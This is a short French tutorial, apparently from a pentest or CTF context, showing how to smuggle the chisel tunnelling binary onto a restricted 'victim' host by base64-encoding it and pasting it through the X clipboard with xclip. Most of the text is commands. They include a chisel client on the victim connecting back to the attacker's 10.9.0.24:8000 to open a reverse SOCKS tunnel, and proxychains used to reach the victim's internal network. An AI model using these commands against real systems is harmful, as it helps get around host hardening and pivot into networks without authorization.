La victime a limité au minimum le nombre de logiciels disponibles pour qu’il soit particulièrement difficile pour un attaquant d’obtenir le compte de l’administrateur ou encore d’exfiltrer de l’information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une méthode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu’aucun utilitaire n’est offert. Le principale est simple, vous envoyer le fichier par le terminal , caractère par caractère! Pas manuellement, mais avec l’utilitaire xclip. Voici comment procéder.
apt install xclip
xclip permet de copier un fichier en utilisant le clipboard du serveur X
pour se faire, vous encodez le fichier au format base64 et le copier dans le clipboard
cat chisel | base64 -w500 | xclip -sel o #sur l'ordinateur de l'attaquant (XServer). ceci permettra de copier chisel (ou un autre fichier) sur la vitime pour infiltrer le réseau
Sur la victime
cat << EOF > chisel.base64
#ici on utilise les touches SHIFT+INSERT ou le bonton droit de la souris et Paste Selection
#on attend que le clipboard soit totalement affiché...
EOF
cat chisel.base64 | base64 -d > chisel
chmod +x chisel
Dans le fichier /etc/proxychains.conf de l’attaquant
[ProxyList]
socks5 127.0.0.1 1080
Sur l’attaquant
sudo ./chisel server -p 8000 --reverse
Sur la victime
./chisel client 10.9.0.24:8000 R:socks
On peut maintenant accéder aux réseaux disponibles sur la victime en utilisant notre proxy sur le port 1080
proxychains curl 192.168.3.22:3386 -v